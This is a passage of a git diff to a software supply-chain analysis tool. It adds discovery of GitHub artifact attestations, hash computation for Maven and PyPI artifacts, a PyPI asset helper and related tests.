passed PURL based on the Maven registry standard. + + Parameters + ---------- + purl: PackageURL + The PURL of the artifact. + + Returns + ------- + str | None + The artifact file name, or None if invalid. + """ + if not purl.version: + return None + + return purl.name + "-" + purl.version + ".jar" diff --git a/src/macaron/malware_analyzer/pypi_heuristics/sourcecode/suspicious_setup.py b/src/macaron/malware_analyzer/pypi_heuristics/sourcecode/suspicious_setup.py index 89d1909a3..ebde2a21f 100644 --- a/src/macaron/malware_analyzer/pypi_heuristics/sourcecode/suspicious_setup.py +++ b/src/macaron/malware_analyzer/pypi_heuristics/sourcecode/suspicious_setup.py @@ -59,7 +59,7 @@ def _get_setup_source_code(self, pypi_package_json: PyPIPackageJsonAsset) -> str response = requests.get(sourcecode_url, stream=True, timeout=40) response.raise_for_status() except requests.exceptions.HTTPError as http_err: - logger.debug("HTTP error occurred: %s", http_err) + logger.debug("HTTP error occurred when trying to download source: %s", http_err) return None if response.status_code != 200: diff --git a/src/macaron/repo_finder/repo_finder.py b/src/macaron/repo_finder/repo_finder.py index e6c026554..9017a4ae0 100644 --- a/src/macaron/repo_finder/repo_finder.py +++ b/src/macaron/repo_finder/repo_finder.py @@ -166,7 +166,12 @@ def find_repo_alternative( found_repo, outcome = repo_finder_pypi.find_repo(purl, package_registries_info) if not found_repo: - logger.debug("Could not find repository using type specific (%s) methods for PURL: %s", purl.type, purl) + logger.debug( + "Could not find repository using type specific (%s) methods for PURL %s. Outcome: %s", + purl.type, + purl, + outcome, + ) return found_repo, outcome diff --git a/src/macaron/repo_finder/repo_finder_pypi.py b/src/macaron/repo_finder/repo_finder_pypi.py index b11f9cbe6..c0c273154 100644 --- a/src/macaron/repo_finder/repo_finder_pypi.py +++ b/src/macaron/repo_finder/repo_finder_pypi.py @@ -9,7 +9,7 @@ from macaron.repo_finder.repo_finder_enums import RepoFinderInfo from macaron.repo_finder.repo_validator import find_valid_repository_url from macaron.slsa_analyzer.package_registry import PACKAGE_REGISTRIES, PyPIRegistry -from macaron.slsa_analyzer.package_registry.pypi_registry import PyPIPackageJsonAsset +from macaron.slsa_analyzer.package_registry.pypi_registry import PyPIPackageJsonAsset, find_or_create_pypi_asset from macaron.slsa_analyzer.specs.package_registry_spec import PackageRegistryInfo logger: logging.Logger = logging.getLogger(__name__) @@ -44,38 +44,29 @@ def find_repo( ), None, ) + if not pypi_info: + return "", RepoFinderInfo.PYPI_NO_REGISTRY - if not pypi_info or not isinstance(pypi_info.package_registry, PyPIRegistry): - pypi_registry = next((registry for registry in PACKAGE_REGISTRIES if isinstance(registry, PyPIRegistry)), None) - else: - pypi_registry = pypi_info.package_registry - - if not pypi_registry: - logger.debug("PyPI package registry not available.") - return "", RepoFinderInfo.PYPI_NO_REGISTRY + if not purl.version: + return "", RepoFinderInfo.NO_VERSION_PROVIDED - pypi_asset = None - from_metadata = False + # Create the asset. if pypi_info: - for existing_asset in pypi_info.metadata: - if not isinstance(existing_asset, PyPIPackageJsonAsset): - continue - - if existing_asset.component_name == purl.name: - pypi_asset = existing_asset - from_metadata = True - break + pypi_asset = find_or_create_pypi_asset(purl.name, purl.version, pypi_info) + else: + # If this function has been reached via find-source, we do not store the asset. + pypi_registry = next((registry for registry in PACKAGE_REGISTRIES if isinstance(registry, PyPIRegistry)), None) + if not pypi_registry: + return "", RepoFinderInfo.PYPI_NO_REGISTRY + pypi_asset = PyPIPackageJsonAsset(purl.name, purl.version, False, pypi_registry, {}, "") if not pypi_asset: - pypi_asset = PyPIPackageJsonAsset(purl.name, purl.version, False, pypi_registry, {}, "") + # This should be unreachable, as the pypi_registry has already been confirmed to be of type PyPIRegistry. + return "", RepoFinderInfo.PYPI_NO_REGISTRY if not pypi_asset.package_json and not pypi_asset.download(dest=""): return "", RepoFinderInfo.PYPI_HTTP_ERROR - if not from_metadata and pypi_info: - # Save the asset for later use. - pypi_info.metadata.append(pypi_asset) - url_dict = pypi_asset.get_project_links() if not url_dict: return "", RepoFinderInfo.PYPI_JSON_ERROR diff --git a/src/macaron/slsa_analyzer/analyzer.py b/src/macaron/slsa_analyzer/analyzer.py index 8fd2e5f83..23a252c97 100644 --- a/src/macaron/slsa_analyzer/analyzer.py +++ b/src/macaron/slsa_analyzer/analyzer.py @@ -20,7 +20,10 @@ from sqlalchemy.orm import Session from macaron import __version__ -from macaron.artifact.local_artifact import get_local_artifact_dirs +from macaron.artifact.local_artifact import ( + get_local_artifact_dirs, + get_local_artifact_hash, +) from macaron.config.global_config import global_config from macaron.config.target_config import Configuration from macaron.database.database_manager import DatabaseManager, get_db_manager, get_db_session @@ -41,6 +44,7 @@ ProvenanceError, PURLNotFoundError, ) +from macaron.json_tools import json_extract from macaron.output_reporter.reporter import FileReporter from macaron.output_reporter.results import Record, Report, SCMStatus from macaron.provenance import provenance_verifier @@ -66,12 +70,19 @@ from macaron.slsa_analyzer.checks import * # pylint: disable=wildcard-import,unused-wildcard-import # noqa: F401,F403 from macaron.slsa_analyzer.ci_service import CI_SERVICES from macaron.slsa_analyzer.database_store import store_analyze_context_to_db -from macaron.slsa_analyzer.git_service import GIT_SERVICES, BaseGitService +from macaron.slsa_analyzer.git_service import GIT_SERVICES, BaseGitService, GitHub from macaron.slsa_analyzer.git_service.base_git_service import NoneGitService from macaron.slsa_analyzer.git_url import GIT_REPOS_DIR -from macaron.slsa_analyzer.package_registry import PACKAGE_REGISTRIES +from macaron.slsa_analyzer.package_registry import PACKAGE_REGISTRIES, MavenCentralRegistry, PyPIRegistry +from macaron.slsa_analyzer.package_registry.pypi_registry import find_or_create_pypi_asset from macaron.slsa_analyzer.provenance.expectations.expectation_registry import ExpectationRegistry -from macaron.slsa_analyzer.provenance.intoto import InTotoPayload, InTotoV01Payload +from macaron.slsa_analyzer.provenance.intoto import ( + InTotoPayload, + InTotoV01Payload, + ValidateInTotoPayloadError, + validate_intoto_payload, +) +from macaron.slsa_analyzer.provenance.loader import decode_provenance from macaron.slsa_analyzer.provenance.slsa import SLSAProvenanceData from macaron.slsa_analyzer.registry import registry from macaron.slsa_analyzer.specs.ci_spec import CIInfo @@ -414,6 +425,17 @@ def run_single( status=SCMStatus.ANALYSIS_FAILED, ) + local_artifact_dirs = None + if parsed_purl and parsed_purl.type in self.local_artifact_repo_mapper: + local_artifact_repo_path = self.local_artifact_repo_mapper[parsed_purl.type] + try: + local_artifact_dirs = get_local_artifact_dirs( + purl=parsed_purl, + local_artifact_repo_path=local_artifact_repo_path, + ) + except LocalArtifactFinderError as error: + logger.debug(error) + # Prepare the repo. git_obj = None commit_finder_outcome = CommitFinderInfo.NOT_USED @@ -491,6 +513,14 @@ def run_single( git_service = self._determine_git_service(analyze_ctx) self._determine_ci_services(analyze_ctx, git_service) self._determine_build_tools(analyze_ctx, git_service) + + # Try to find an attestation from GitHub, if applicable. + if parsed_purl and not provenance_payload and analysis_target.repo_path and isinstance(git_service, GitHub): + # Try to discover GitHub attestation for the target software component. + artifact_hash = self.get_artifact_hash(parsed_purl, local_artifact_dirs, package_registries_info) + if artifact_hash: + provenance_payload = self.get_github_attestation_payload(analyze_ctx, git_service, artifact_hash) + if parsed_purl is not None: self._verify_repository_link(parsed_purl, analyze_ctx) self._determine_package_registries(analyze_ctx, package_registries_info) @@ -556,16 +586,8 @@ def run_single( analyze_ctx.dynamic_data["analyze_source"] = analyze_source analyze_ctx.dynamic_data["force_analyze_source"] = force_analyze_source - if parsed_purl and parsed_purl.type in self.local_artifact_repo_mapper: - local_artifact_repo_path = self.local_artifact_repo_mapper[parsed_purl.type] - try: - local_artifact_dirs = get_local_artifact_dirs( - purl=parsed_purl, - local_artifact_repo_path=local_artifact_repo_path, - ) - analyze_ctx.dynamic_data["local_artifact_paths"].extend(local_artifact_dirs) - except LocalArtifactFinderError as error: - logger.debug(error) + if local_artifact_dirs: + analyze_ctx.dynamic_data["local_artifact_paths"].extend(local_artifact_dirs) analyze_ctx.check_results = registry.scan(analyze_ctx) @@ -955,6 +977,144 @@ def create_analyze_ctx(self, component: Component) -> AnalyzeContext: return analyze_ctx + def get_artifact_hash( + self, + purl: PackageURL, + local_artifact_dirs: list[str] | None, + package_registries_info: list[PackageRegistryInfo], + ) -> str | None: + """Get the hash of the artifact found from the passed PURL using local or remote files. + + Provided local caches will be searched first. Artifacts will be downloaded if nothing is found within local + caches, or if no appropriate cache is provided for the target language. + Downloaded artifacts will be added to the passed package registry to prevent downloading them again. + + Parameters + ---------- + purl: PackageURL + The PURL of the artifact. + local_artifact_dirs: list[str] | None + The list of directories that may contain the artifact file. + package_registries_info: list[PackageRegistryInfo] + The list of package registry information. + + Returns + ------- + str | None + The hash of the artifact, or None if no artifact can be found locally or remotely. + """ + if local_artifact_dirs: + # Try to get the hash from a local file. + artifact_hash = get_local_artifact_hash(purl, local_artifact_dirs) + + if artifact_hash: + return artifact_hash + + # Download the artifact. + if purl.type == "maven": + maven_registry = next( + ( + package_registry + for package_registry in PACKAGE_REGISTRIES + if isinstance(package_registry, MavenCentralRegistry) + ), + None, + ) + if not maven_registry: + return None + + return maven_registry.get_artifact_hash(purl) + + if purl.type == "pypi": + pypi_registry = next( + ( + package_registry + for package_registry in PACKAGE_REGISTRIES + if isinstance(package_registry, PyPIRegistry) + ), + None, + ) + if not pypi_registry: + logger.debug("Missing registry for PyPI") + return None + + registry_info = next( + ( + info + for info in package_registries_info + if info.package_registry == pypi_registry and info.build_tool_name in {"pip", "poetry"} + ), + None, + ) + if not registry_info: + logger.debug("Missing registry information for PyPI") + return None + + if not purl.version: + return None + + pypi_asset = find_or_create_pypi_asset(purl.name, purl.version, registry_info) + if not pypi_asset: + return None + + pypi_asset.has_repository = True + if not pypi_asset.download(""): + return None + + artifact_hash = pypi_asset.get_sha256() + if artifact_hash: + return artifact_hash + + source_url = pypi_asset.get_sourcecode_url("bdist_wheel") + if not source_url: + return None + + return pypi_registry.get_artifact_hash(source_url) + + logger.debug("Purl type '%s' not yet supported for GitHub attestation discovery.", purl.type) + return None + + def get_github_attestation_payload( + self, analyze_ctx: AnalyzeContext, git_service: GitHub, artifact_hash: str + ) -> InTotoPayload | None: + """Get the GitHub attestation associated with the given PURL, or None if it cannot be found. + + The schema of GitHub attestation can be found on the API page: + https://docs.github.com/en/rest/repos/repos?apiVersion=2022-11-28#list-attestations + + Parameters + ---------- + analyze_ctx: AnalyzeContext + The analysis context. + git_service: GitHub + The Git service to retrieve the attestation from. + artifact_hash: str + The hash of the related artifact. + + Returns + ------- + InTotoPayload | None + The attestation payload, if found. + """ + git_attestation_dict = git_service.api_client.get_attestation( + analyze_ctx.component.repository.full_name, artifact_hash + ) + + if not git_attestation_dict: + return None + + git_attestation_list = json_extract(git_attestation_dict, ["attestations"], list) + if not git_attestation_list: + return None + + payload = decode_provenance(git_attestation_list[0]) + + try: + return validate_intoto_payload(payload) + except ValidateInTotoPayloadError as error: + logger.debug("Invalid attestation payload: %s", error) + return None + def _determine_git_service(self, analyze_ctx: AnalyzeContext) -> BaseGitService: """Determine the Git service used by the software component.""" remote_path = analyze_ctx.component.repository.remote_path if analyze_ctx.component.repository else None diff --git a/src/macaron/slsa_analyzer/checks/build_script_check.py b/src/macaron/slsa_analyzer/checks/build_script_check.py index 44f675ce4..ccd61cca1 100644 --- a/src/macaron/slsa_analyzer/checks/build_script_check.py +++ b/src/macaron/slsa_analyzer/checks/build_script_check.py @@ -27,10 +27,6 @@ class BuildScriptFacts(CheckFacts): __tablename__ = "_build_script_check" - # This check is disabled here due to a bug in pylint. The Mapped class triggers a false positive. - # It may arbitrarily become true that this is no longer needed in this check, or will be needed in another check. - # pylint: disable=unsubscriptable-object - #: The primary key. id: Mapped[int] = mapped_column(ForeignKey("_check_facts.id"), primary_key=True) # noqa: A003 diff --git a/src/macaron/slsa_analyzer/checks/detect_malicious_metadata_check.py b/src/macaron/slsa_analyzer/checks/detect_malicious_metadata_check.py index a7d32fc18..80a53d610 100644 --- a/src/macaron/slsa_analyzer/checks/detect_malicious_metadata_check.py +++ b/src/macaron/slsa_analyzer/checks/detect_malicious_metadata_check.py @@ -34,7 +34,11 @@ from macaron.slsa_analyzer.checks.check_result import CheckResultData, CheckResultType, Confidence, JustificationType from macaron.slsa_analyzer.package_registry.deps_dev import APIAccessError, DepsDevService from macaron.slsa_analyzer.package_registry.osv_dev import OSVDevService -from macaron.slsa_analyzer.package_registry.pypi_registry import PyPIPackageJsonAsset, PyPIRegistry +from macaron.slsa_analyzer.package_registry.pypi_registry import ( + PyPIPackageJsonAsset, + PyPIRegistry, + find_or_create_pypi_asset, +) from macaron.slsa_analyzer.registry import registry from macaron.slsa_analyzer.specs.package_registry_spec import PackageRegistryInfo @@ -280,29 +284,16 @@ def run_check(self, ctx: AnalyzeContext) -> CheckResultData: case PackageRegistryInfo( build_tool_name="pip" | "poetry", build_tool_purl_type="pypi", - package_registry=PyPIRegistry() as pypi_registry, + package_registry=PyPIRegistry(), ) as pypi_registry_info: - # Retrieve the pre-existing AssetLocator object for the PyPI package JSON object, if it exists. - pypi_package_json = next( - ( - asset - for asset in pypi_registry_info.metadata - if isinstance(asset, PyPIPackageJsonAsset) - and asset.component_name == ctx.component.name - and asset.component_version == ctx.component.version - ), - None, + # Retrieve the pre-existing asset, or create a new one. + pypi_package_json = find_or_create_pypi_asset( + ctx.component.name, ctx.component.version, pypi_registry_info ) if not pypi_package_json: - # Create an AssetLocator object for the PyPI package JSON object. - pypi_package_json = PyPIPackageJsonAsset( - component_name=ctx.component.name, - component_version=ctx.component.version, - has_repository=ctx.component.repository is not None, - pypi_registry=pypi_registry, - package_json={}, - package_sourcecode_path="", - ) + return CheckResultData(result_tables=[], result_type=CheckResultType.UNKNOWN) + + pypi_package_json.has_repository = ctx.component.repository is not None pypi_registry_info.metadata.append(pypi_package_json) diff --git a/src/macaron/slsa_analyzer/checks/provenance_commit_check.py b/src/macaron/slsa_analyzer/checks/provenance_commit_check.py index 61fb6b8a3..b2b5d7297 100644 --- a/src/macaron/slsa_analyzer/checks/provenance_commit_check.py +++ b/src/macaron/slsa_analyzer/checks/provenance_commit_check.py @@ -22,10 +22,6 @@ class ProvenanceDerivedCommitFacts(CheckFacts): __tablename__ = "_provenance_derived_commit_check" - # This check is disabled here due to a bug in pylint. The Mapped class triggers a false positive. - # It may arbitrarily become true that this is no longer needed in this check, or will be needed in another check. - # pylint: disable=unsubscriptable-object - #: The primary key. id: Mapped[int] = mapped_column(ForeignKey("_check_facts.id"), primary_key=True) # noqa: A003 diff --git a/src/macaron/slsa_analyzer/checks/provenance_repo_check.py b/src/macaron/slsa_analyzer/checks/provenance_repo_check.py index 063e68c2b..1f35fef39 100644 --- a/src/macaron/slsa_analyzer/checks/provenance_repo_check.py +++ b/src/macaron/slsa_analyzer/checks/provenance_repo_check.py @@ -22,6 +22,10 @@ class ProvenanceDerivedRepoFacts(CheckFacts): __tablename__ = "_provenance_derived_repo_check" + # This check is disabled here due to a bug in pylint. The Mapped class triggers a false positive. + # It may arbitrarily become true that this is no longer needed in this check, or will be needed in another check. + # pylint: disable=unsubscriptable-object + #: The primary key. id: Mapped[int] = mapped_column(ForeignKey("_check_facts.id"), primary_key=True) # noqa: A003 diff --git a/src/macaron/slsa_analyzer/git_service/api_client.py b/src/macaron/slsa_analyzer/git_service/api_client.py index 8e987e6ca..681a1f4e0 100644 --- a/src/macaron/slsa_analyzer/git_service/api_client.py +++ b/src/macaron/slsa_analyzer/git_service/api_client.py @@ -1,4 +1,4 @@ -# Copyright (c) 2022 - 2024, Oracle and/or its affiliates. All rights reserved. +# Copyright (c) 2022 - 2025, Oracle and/or its affiliates. All rights reserved. # Licensed under the Universal Permissive License v 1.0 as shown at https://oss.oracle.com/licenses/upl/. """The module provides API clients for VCS services, such as GitHub.""" @@ -659,6 +659,25 @@ def download_asset(self, url: str, download_path: str) -> bool: return True + def get_attestation(self, full_name: str, artifact_hash: str) -> dict: + """Download and return the attestation associated with the passed artifact hash, if any. + + Parameters + ---------- + full_name : str + The full name of the repo. + artifact_hash: str + The SHA256 hash of an artifact. + + Returns + ------- + dict + The attestation data, or an empty dict if not found. + """ + url = f"{GhAPIClient._REPO_END_POINT}/{full_name}/attestations/sha256:{artifact_hash}" + response_data = send_get_http(url, self.headers) + return response_data or {} + def get_default_gh_client(access_token: str) -> GhAPIClient: """Return a GhAPIClient instance with default values. diff --git a/src/macaron/slsa_analyzer/package_registry/maven_central_registry.py b/src/macaron/slsa_analyzer/package_registry/maven_central_registry.py index 131051b66..2fe3c5cea 100644 --- a/src/macaron/slsa_analyzer/package_registry/maven_central_registry.py +++ b/src/macaron/slsa_analyzer/package_registry/maven_central_registry.py @@ -2,14 +2,16 @@ # Licensed under the Universal Permissive License v 1.0 as shown at https://oss.oracle.com/licenses/upl/. """The module provides abstractions for the Maven Central package registry.""" - +import hashlib import logging import urllib.parse from datetime import datetime, timezone import requests from packageurl import PackageURL +from requests import RequestException +from macaron.artifact.maven import construct_maven_repository_path, construct_primary_jar_file_name from macaron.config.defaults import defaults from macaron.errors import ConfigurationError, InvalidHTTPResponseError from macaron.slsa_analyzer.package_registry.package_registry import PackageRegistry @@ -236,3 +238,82 @@ def find_publish_timestamp(self, purl: str) -> datetime: raise InvalidHTTPResponseError(f"The timestamp returned by {url} is invalid") from error raise InvalidHTTPResponseError(f"Invalid response from Maven central for {url}.") + + def get_artifact_hash(self, purl: PackageURL) -> str | None: + """Return the hash of the artifact found by the passed purl relevant to the registry's URL. + + An artifact's URL will be as follows: + {registry_url}/{artifact_path}/{file_name} + Where: + - {registry_url} is determined by the setup/config of the registry. + - {artifact_path} is determined by the Maven repository layout. + (See: https://maven.apache.org/repository/layout.html and + https://maven.apache.org/guides/mini/guide-naming-conventions.html) + - {file_name} is {purl.name}-{purl.version}.jar (For a JAR artefact) + + Example + ------- + PURL: pkg:maven/com.experlog/xapool@1.5.0 + URL: https://repo1.maven.org/maven2/com/experlog/xapool/1.5.0/xapool-1.5.0.jar + + Parameters + ---------- + purl: PackageURL + The purl of the artifact. + + Returns + ------- + str | None + The hash of the artifact, or None if not found. + """ + if not purl.namespace: + return None + + file_name = construct_primary_jar_file_name(purl) + if not (purl.version and file_name): + return None + + # Maven supports but does not require a sha256 hash of uploaded artifacts. + artifact_path = construct_maven_repository_path(purl.namespace, purl.name, purl.version) + artifact_url = self.registry_url + "/" + artifact_path + "/" + file_name + artifact_sha256_url = artifact_url + ".sha256" + logger.debug("Search for artifact hash using URL: %s", [artifact_sha256_url, artifact_url]) + + response = send_get_http_raw(artifact_sha256_url, {}) + retrieved_artifact_hash = None + if response and (retrieved_artifact_hash := response.text): + # As Maven hashes are user provided and not verified they serve as a reference only. + logger.debug("Found hash of artifact: %s", retrieved_artifact_hash) + + try: + response = requests.get(artifact_url, stream=True, timeout=40) + response.raise_for_status() + except requests.exceptions.HTTPError as http_err: + logger.debug("HTTP error occurred when trying to download artifact: %s", http_err) + return None + + if response.status_code != 200: + return None + + # Download file and compute hash as chunks are received. + hash_algorithm = hashlib.sha256() + try: + for chunk in response.iter_content(): + hash_algorithm.update(chunk) + except RequestException as error: + # Something went wrong with the request, abort. + logger.debug("Error while streaming target file: %s", error) + response.close() + return None + + computed_artifact_hash: str = hash_algorithm.hexdigest() + if retrieved_artifact_hash and computed_artifact_hash != retrieved_artifact_hash: + logger.debug( + "Artifact hash and discovered hash do not match: %s != %s", + computed_artifact_hash, + retrieved_artifact_hash, + ) + return None + + logger.debug("Computed hash of artifact: %s", computed_artifact_hash) + return computed_artifact_hash diff --git a/src/macaron/slsa_analyzer/package_registry/package_registry.py b/src/macaron/slsa_analyzer/package_registry/package_registry.py index 9e71fc595..ca0adfa62 100644 --- a/src/macaron/slsa_analyzer/package_registry/package_registry.py +++ b/src/macaron/slsa_analyzer/package_registry/package_registry.py @@ -7,9 +7,9 @@ from abc import ABC, abstractmethod from datetime import datetime -from macaron.errors import InvalidHTTPResponseError +from macaron.errors import APIAccessError, InvalidHTTPResponseError from macaron.json_tools import json_extract -from macaron.slsa_analyzer.package_registry.deps_dev import APIAccessError, DepsDevService +from macaron.slsa_analyzer.package_registry.deps_dev import DepsDevService logger: logging.Logger = logging.getLogger(__name__) diff --git a/src/macaron/slsa_analyzer/package_registry/pypi_registry.py b/src/macaron/slsa_analyzer/package_registry/pypi_registry.py index 2c6af515c..13156f7f7 100644 --- a/src/macaron/slsa_analyzer/package_registry/pypi_registry.py +++ b/src/macaron/slsa_analyzer/package_registry/pypi_registry.py @@ -2,7 +2,9 @@ # Licensed under the Universal Permissive License v 1.0 as shown at https://oss.oracle.com/licenses/upl/. """The module provides abstractions for the pypi package registry.""" +from __future__ import annotations +import hashlib import logging import os import re @@ -14,6 +16,7 @@ from contextlib import contextmanager from dataclasses import dataclass from datetime import datetime +from typing import TYPE_CHECKING import requests from bs4 import BeautifulSoup, Tag @@ -26,6 +29,9 @@ from macaron.slsa_analyzer.package_registry.package_registry import PackageRegistry from macaron.util import send_get_http_raw +if TYPE_CHECKING: + from macaron.slsa_analyzer.specs.package_registry_spec import PackageRegistryInfo + logger: logging.Logger = logging.getLogger(__name__) @@ -263,6 +269,44 @@ def download_package_sourcecode(self, url: str) -> str: logger.debug("Temporary download and unzip of %s stored in %s", file_name, temp_dir) return temp_dir + def get_artifact_hash(self, artifact_url: str) -> str | None: + """Return the hash of the artifact found at the passed URL. + + Parameters + ---------- + artifact_url + The URL of the artifact. + + Returns + ------- + str | None + The hash of the artifact, or None if not found. + """ + try: + response = requests.get(artifact_url, stream=True, timeout=40) + response.raise_for_status() + except requests.exceptions.HTTPError as http_err: + logger.debug("HTTP error occurred when trying to download artifact: %s", http_err) + return None + + if response.status_code != 200: + logger.debug("Invalid response: %s", response.status_code) + return None + + hash_algorithm = hashlib.sha256() + try: + for chunk in response.iter_content(): + hash_algorithm.update(chunk) + except RequestException as error: + # Something went wrong with the request, abort. + logger.debug("Error while streaming source file: %s", error) + response.close() + return None + + artifact_hash: str = hash_algorithm.hexdigest() + logger.debug("Computed artifact hash: %s", artifact_hash) + return artifact_hash + def get_package_page(self, package_name: str) -> str | None: """Implement custom API to get package main page. @@ -499,15 +543,19 @@ def get_latest_version(self) -> str | None: """ return json_extract(self.package_json, ["info", "version"], str) - def get_sourcecode_url(self) -> str | None: + def get_sourcecode_url(self, package_type: str = "sdist") -> str | None: """Get the url of the source distribution. + Parameters + ---------- + package_type: str + The package type to retrieve the URL of. + Returns ------- str | None The URL of the source distribution. """ - urls: list | None = None if self.component_version: urls = json_extract(self.package_json, ["releases", self.component_version], list) else: @@ -516,7 +564,7 @@ def get_sourcecode_url(self) -> str | None: if not urls: return None for distribution in urls: - if distribution.get("packagetype") != "sdist": + if distribution.get("packagetype") != package_type: continue # We intentionally check if the url is None and use empty string if that's the case. source_url: str = distribution.get("url") or "" @@ -670,3 +718,64 @@ def iter_sourcecode(self) -> Iterator[tuple[str, bytes]]: contents = handle.read() yield filepath, contents + + def get_sha256(self) -> str | None: + """Get the sha256 hash of the artifact from its payload. + + Returns + ------- + str | None + The sha256 hash of the artifact, or None if not found. + """ + if not self.package_json and not self.download(""): + return None + + if not self.component_version: + artifact_hash = json_extract(self.package_json, ["urls", 0, "digests", "sha256"], str) + else: + artifact_hash = json_extract( + self.package_json, ["releases", self.component_version, 0, "digests", "sha256"], str + ) + logger.debug("Found sha256 hash: %s", artifact_hash) + return artifact_hash + + +def find_or_create_pypi_asset( + asset_name: str, asset_version: str | None, pypi_registry_info: PackageRegistryInfo +) -> PyPIPackageJsonAsset | None: + """Find the matching asset in the provided package registry information, or if not found, create and add it. + + Parameters + ---------- + asset_name: str + The name of the asset. + asset_version: str | None + The version of the asset. + pypi_registry_info: + The package registry information. If a new asset is created, it will be added to the metadata of this registry. + + Returns + ------- + PyPIPackageJsonAsset | None + The asset, or None if not found. + """ + asset = next( + ( + asset + for asset in pypi_registry_info.metadata + if isinstance(asset, PyPIPackageJsonAsset) and asset.component_name == asset_name + ), + None, + ) + + if asset: + return asset + + package_registry = pypi_registry_info.package_registry + if not isinstance(package_registry, PyPIRegistry): + logger.debug("Failed to create PyPIPackageJson asset.") + return None + + asset = PyPIPackageJsonAsset(asset_name, asset_version, False, package_registry, {}, "") + pypi_registry_info.metadata.append(asset) + return asset diff --git a/src/macaron/slsa_analyzer/provenance/loader.py b/src/macaron/slsa_analyzer/provenance/loader.py index 19c256315..106cc03b5 100644 --- a/src/macaron/slsa_analyzer/provenance/loader.py +++ b/src/macaron/slsa_analyzer/provenance/loader.py @@ -80,15 +80,33 @@ def _load_provenance_file_content( try: decompressed_file_content = gzip.decompress(file_content) decoded_file_content = decompressed_file_content.decode() - provenance = json.loads(decoded_file_content) + return decode_provenance(json.loads(decoded_file_content)) except (gzip.BadGzipFile, EOFError, zlib.error): decoded_file_content = file_content.decode() - provenance = json.loads(decoded_file_content) + return decode_provenance(json.loads(decoded_file_content)) except (json.JSONDecodeError, TypeError, UnicodeDecodeError) as error: raise LoadIntotoAttestationError( "Cannot deserialize the file content as JSON.", ) from error + +def decode_provenance(provenance: dict) -> dict[str, JsonType]: + """Find and decode the provenance payload. + + Parameters + ---------- + provenance: dict + The contents of the provenance from which the payload will be decoded. + + Returns + ------- + The decoded payload. + + Raises + ------ + LoadIntotoAttestationError + If the payload could not be decoded. + """ # The GitHub Attestation stores the DSSE envelope in `dsseEnvelope` property. dsse_envelope = provenance.get("dsseEnvelope", None) if dsse_envelope: @@ -101,6 +119,10 @@ def _load_provenance_file_content( if not provenance_payload: # PyPI Attestation. provenance_payload = json_extract(provenance, ["envelope", "statement"], str) + if not provenance_payload: + # GitHub Attestation. + # TODO Check if old method (above) actually works. + provenance_payload = json_extract(provenance, ["bundle", "dsseEnvelope", "payload"], str) if not provenance_payload: raise LoadIntotoAttestationError( 'Cannot find the "payload" field in the decoded provenance.', diff --git a/tests/artifact/test_local_artifact.py b/tests/artifact/test_local_artifact.py index 1468bef42..3124afc3c 100644 --- a/tests/artifact/test_local_artifact.py +++ b/tests/artifact/test_local_artifact.py @@ -15,7 +15,9 @@ construct_local_artifact_dirs_glob_pattern_pypi_purl, find_artifact_dirs_from_python_venv, get_local_artifact_dirs, + get_local_artifact_hash, ) +from macaron.artifact.maven import construct_primary_jar_file_name from macaron.errors import LocalArtifactFinderError @@ -249,3 +251,21 @@ def test_get_local_artifact_paths_succeeded_pypi(tmp_path: Path) -> None: ) assert sorted(result) == sorted(pypi_artifact_paths) + + +def test_get_local_artifact_hash() -> None: + """Test the get local artifact hash function.""" + artifact_purl = PackageURL.from_string("pkg:maven/test/test@1") + artifact_jar_name = construct_primary_jar_file_name(artifact_purl) + + assert artifact_jar_name + + with tempfile.TemporaryDirectory() as temp_dir: + artifact_path = os.path.join(temp_dir, artifact_jar_name) + with open(artifact_path, "w", encoding="utf8") as file: + file.write("1") + + # A file containing: "1". + target_hash = "6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b" + + assert target_hash == get_local_artifact_hash(artifact_purl, [temp_dir]) diff --git a/tests/artifact/test_maven.py b/tests/artifact/test_maven.py index 6014c20ad..b39856e4e 100644 --- a/tests/artifact/test_maven.py +++ b/tests/artifact/test_maven.py @@ -1,4 +1,4 @@ -# Copyright (c) 2024 - 2024, Oracle and/or its affiliates. All rights reserved. +# Copyright (c) 2024 - 2025, Oracle and/or its affiliates. All rights reserved. # Licensed under the Universal Permissive License v 1.0 as shown at https://oss.oracle.com/licenses/upl/. """Tests for types and utilities for Maven artifacts.""" @@ -6,7 +6,11 @@ import pytest from packageurl import PackageURL -from macaron.artifact.maven import MavenSubjectPURLMatcher, construct_maven_repository_path +from macaron.artifact.maven import ( + MavenSubjectPURLMatcher, + construct_maven_repository_path, + construct_primary_jar_file_name, +) from macaron.slsa_analyzer.provenance.intoto import InTotoPayload, validate_intoto_payload @@ -161,3 +165,10 @@ def test_to_group_folder_path( ) -> None: """Test the ``to_gorup_folder_path`` method.""" assert construct_maven_repository_path(group_id) == expected_group_path + + +def test_construct_primary_jar_file_name() -> None: + """Test the artifact file name function.""" + assert not construct_primary_jar_file_name(PackageURL.from_string("pkg:maven/test/example")) + + assert construct_primary_jar_file_name(PackageURL.from_string("pkg:maven/text/example@1")) == "example-1.jar" diff --git a/tests/integration/cases/github_maven_attestation/policy.dl b/tests/integration/cases/github_maven_attestation/policy.dl new file mode 100644 index 000000000..9df46219b --- /dev/null +++ b/tests/integration/cases/github_maven_attestation/policy.dl @@ -0,0 +1,10 @@ +/* Copyright (c) 2024 - 2025, Oracle and/or its affiliates. All rights reserved. */ +/* Licensed under the Universal Permissive License v 1.0 as shown at https://oss.oracle.com/licenses/upl/. */ + +#include "prelude.dl" + +Policy("test_policy", component_id, "") :- + check_passed(component_id, "mcn_provenance_available_1"). + +apply_policy_to("test_policy", component_id) :- + is_component(component_id, "pkg:maven/io.liftwizard/liftwizard-checkstyle@2.1.22"). diff --git a/tests/integration/cases/github_maven_attestation/test.yaml b/tests/integration/cases/github_maven_attestation/test.yaml new file mode 100644 index 000000000..9913d930e --- /dev/null +++ b/tests/integration/cases/github_maven_attestation/test.yaml @@ -0,0 +1,22 @@ +# Copyright (c) 2024 - 2025, Oracle and/or its affiliates. All rights reserved. +# Licensed under the Universal Permissive License v 1.0 as shown at https://oss.oracle.com/licenses/upl/. + +description: | + Discovering attestation of a Maven artifact on GitHub + +tags: +- macaron-python-package + +steps: +- name: Run macaron analyze + kind: analyze + options: + command_args: + - -purl + - pkg:maven/io.liftwizard/liftwizard-checkstyle@2.1.22 + - -rp + - https://github.com/liftwizard/liftwizard +- name: Run macaron verify-policy to verify passed/failed checks + kind: verify + options: + policy: policy.dl diff --git a/tests/integration/cases/github_maven_attestation_local/policy.dl b/tests/integration/cases/github_maven_attestation_local/policy.dl new file mode 